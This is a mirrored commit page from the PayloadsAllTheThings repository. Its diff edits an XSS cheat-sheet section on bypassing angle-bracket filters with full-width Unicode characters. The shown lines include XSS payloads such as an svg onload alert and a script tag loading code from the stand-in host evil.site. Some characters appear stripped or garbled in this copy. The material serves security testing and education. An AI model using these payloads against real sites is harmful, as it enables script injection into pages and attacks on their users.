Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-09-20 14:32:04 +00:00
Code Issues Projects Releases Packages Wiki Activity

Merge pull request #322 from lapolis/patch-1

Browse source 
Added closing bracket in unicode full width bypass
This commit is contained in:
Swissky 2021-01-15 17:42:13 +01:00 committed by GitHub
commit 7b943d46bc
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 5 additions and 3 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

8
XSS Injection/README.md
View file

@ -45,7 +45,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
- [Bypass using an alternate way to redirect](#bypass-unsing-an-alternate-way-to-redirect)
- [Bypass using an alternate way to execute an alert](#bypass-using-an-alternate-way-to-execute-an-alert)
- [Bypass ">" using nothing](#bypass----using-nothing)
- [Bypass "<" using ](#bypass----using-)
- [Bypass "<" and ">" using and ](#bypass----using-)
- [Bypass ";" using another character](#bypass-using------using-another-character)
- [Bypass using HTML encoding](#bypass-using-html-encoding)
- [Bypass using Katana](#bypass-using-katana)
@ -793,10 +793,12 @@ You don't need to close your tags.
<svg onload=alert(1)//
```
### Bypass "<" using
### Bypass "<" and ">" using and
Unicode Character U+FF1C and U+FF1E
```javascript
[̕h+͓.script/src=//evil.site/poc.js>.͓̮̮ͅ=sW&͉̹̻͙̫̦̮̲͏̼̝̫́̕
script/src=//evil.site/poc.js
```
### Bypass ";" using another character